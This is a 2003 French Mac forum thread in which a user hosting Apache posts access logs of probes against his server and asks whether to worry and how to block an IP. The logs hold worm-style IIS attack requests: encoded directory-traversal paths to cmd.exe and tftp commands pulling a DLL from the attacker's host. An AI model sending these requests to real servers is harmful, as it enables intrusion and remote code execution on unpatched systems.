pirate??

jeromemac

jeromemac

Membre expert
Club iGen
5 Octobre 2001
3 105
115
47
NICE
salut,
depuis que j'ai l'adsl j'ai mis mon site sur mon g4 et je peut donc voir dans les logs tous les braves gens qui se connectent, en général ma famille, mais assez souvent un windobeux qui essai d'ouvrir des fichier de windows, je vous liste si après les échantillons de commande qu'il essai de faire le brave:

<font class="small">Code:</font><hr /><pre>
81.220.156.231 - - [01/Nov/2003:09:13:41 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:42 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:42 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:09:13:43 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:43 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 308
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20d:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20e:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /c/httpodbc.dll HTTP/1.0" 404 304
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:09:13:52 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
81.220.156.231 - - [01/Nov/2003:09:13:52 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
81.220.156.231 - - [01/Nov/2003:09:13:53 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361
81.220.156.231 - - [01/Nov/2003:09:13:53 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:09:14:00 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:10:43:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:43:38 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:43:39 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:10:52:52 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:52:56 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:52:58 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:10:53:09 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:53:19 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:25:46 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:25:57 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:06 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:21:26:08 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:09 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:10 +0100] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 308
81.220.156.231 - - [01/Nov/2003:21:26:11 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 438

</pre><hr />

et d'ailleur j'en profite pour poser la question avant d'aller me pommé dans l'aide: est ce qu'il est possible de bloquer l'accés à une certaine adresse ip avec MacOsx 10.3, mais pa le serveur.
 
jeromemac a dit:
<font class="small">Code:</font><hr /><pre>
81.220.156.231 - - [01/Nov/2003:........ </pre><hr />
Cliquez pour agrandir...

c'est l'IP du windaube en question ?

moi j'obtiens ça comme info :

ip-231.net-81-220-156.grenoble.rev.numericable.fr (81.220.156.231)
 
gribouille a dit:
c'est l'IP du windaube en question ?

moi j'obtiens ça comme info :

ip-231.net-81-220-156.grenoble.rev.numericable.fr (81.220.156.231)
Cliquez pour agrandir...

ouais c'est sont adresse ip, et j'obtiens effectivement la même chose, mais ce que j'aimerais savoir, c'est est-ce que c'est un con fini et qui bite rien à la vie, ou alors ce truc peut faire quelquechose sur windobe??.... mais si c'est un vrai pirate c'est looouuccchhheee...
 
jeromemac a dit:
salut,
depuis que j'ai l'adsl j'ai mis mon site sur mon g4 et je peut donc voir dans les logs tous les braves gens qui se connectent, en général ma famille, mais assez souvent un windobeux qui essai d'ouvrir des fichier de windows, je vous liste si après les échantillons de commande qu'il essai de faire le brave:
Cliquez pour agrandir...

Question bête : Tu les trouves où les logs ?
 
Jean-iMarc a dit:
Question bête : Tu les trouves où les logs ?
Cliquez pour agrandir...
Salut Jean-iMarc.
J'ai trouvé les miens avec mon FTP Transmit, que j'ai téléchargé sur mon DD.
wink.gif

Image%201-small.jpg

 
Jean-iMarc a dit:
Question bête : Tu les trouves où les logs ?
Cliquez pour agrandir...

ben comme c'est sur mon powermac G4, avec apache, php et mysql, j'ai donc un serveur web gratos sur ma machine, c'est i pas bo
cool.gif
cool.gif
et donc on a des logs de ceux qui se connectent, je peut te dire par exemple que y'a un mec des states qui est passer sur mon site, ainsi que 2 ou trois asiatique, et donc dans ses logs ben on voit ce que j'ai mis au dessus.
 
Je suis bien d'accord, j'ai aussi un apache qui tourne, ce que je voudrais savoir, c'est où est placé le fichier .log dans l'arborescence du disque, car je ne l'ai pas trouvé.
 
Jean-iMarc a dit:
Je suis bien d'accord, j'ai aussi un apache qui tourne, ce que je voudrais savoir, c'est où est placé le fichier .log dans l'arborescence du disque, car je ne l'ai pas trouvé.
Cliquez pour agrandir...

si t'es sous panthere, dans console.app tu as les logs listée, dont sont pour les acces à ton serveur web, sinon si t'es encore sous jaguar ou autre ben pour l'apache intégré au système c'est dans /var/log/httpd
 
AHHH La bien bonne!!!! je viens de voir qu'un autre à essayer de faire des trucs chez moi:

Bloc de code: 
  206.135.1.25 - - [08/Nov/2003:11:58:51 +0100] "GET /scripts/nsiislog.dll" 404 -

et devinez quoi ben c'est kro$of....
en tapant ça : http://206.135.1.25/

voila ou je tombe :
fichier en pdf de copie d'ecran

trop SPAAAACCCEEEE!!!!
alors comment on fait pour les faire chier, je sais pas moi les rediriger sur un site porno, quelqu'un à une idée, à part bloquer leur adresse IP
 
jeromemac a dit:
AHHH La bien bonne!!!! je viens de voir qu'un autre à essayer de faire des trucs chez moi:

Bloc de code: 
  206.135.1.25 - - [08/Nov/2003:11:58:51 +0100] "GET /scripts/nsiislog.dll" 404 -

et devinez quoi ben c'est kro$of....
en tapant ça : http://206.135.1.25/

voila ou je tombe :
fichier en pdf de copie d'ecran

trop SPAAAACCCEEEE!!!!
alors comment on fait pour les faire chier, je sais pas moi les rediriger sur un site porno, quelqu'un à une idée, à part bloquer leur adresse IP
Cliquez pour agrandir...

en fait c'est la page d'acceuil du serveir IIS de kro$oft installé sur cette machine....
crazy.gif
crazy.gif
 
ben on dirait qu'il s'est calmé ou alors il s'est fait pincer... héhé
 

Sujets similaires

KarineN
10.13 High Sierra Ralentissements majeurs avec quelques applis simultanées
Réponses
17
Affichages
2K
macOS
Sly54
Sly54
fun08
iMac iMac ouverture lente
Réponses
53
Affichages
8K
Mac
guytoon48
guytoon48
S
10.13 High Sierra Chauffe + lenteur macbook pro
Réponses
1
Affichages
2K
macOS
hrami
H
T
10.13 High Sierra Test et conseils avant installation High Sierra
Réponses
18
Affichages
18K
macOS
litobar71
litobar71
M
MacBook Pro Macbook PRO 13" problème réparation disque
Réponses
24
Affichages
2K
Mac
Membre supprimé 1060554
M
Haut Bas
Back